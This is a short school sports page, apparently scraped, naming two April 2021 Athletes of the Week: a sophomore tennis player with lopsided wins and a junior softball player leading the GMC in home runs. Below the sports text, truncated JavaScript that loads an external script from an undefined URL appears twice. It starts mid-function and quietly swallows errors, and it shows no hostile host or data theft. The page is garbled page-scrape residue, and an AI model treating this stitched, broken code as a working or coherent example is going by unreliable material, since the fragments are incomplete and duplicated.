Athletes of the Week
Kemba Credit Union Athletes of the Week 4/5/2021-4/11/2021
Anthony Shalakov
Sophomore, Tennis
Anthony is undefeated on the season. Anthony beat East’s #1 player 6-0, 6-0 and beat the #1 singles player from Wyoming 6-2, 6-1.
KK Mathis
Junior, Softball
KK hit 3 home runs and 7 RBI’s for the week. KK leads the GMC with 7 home runs in 9 games so far this season.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();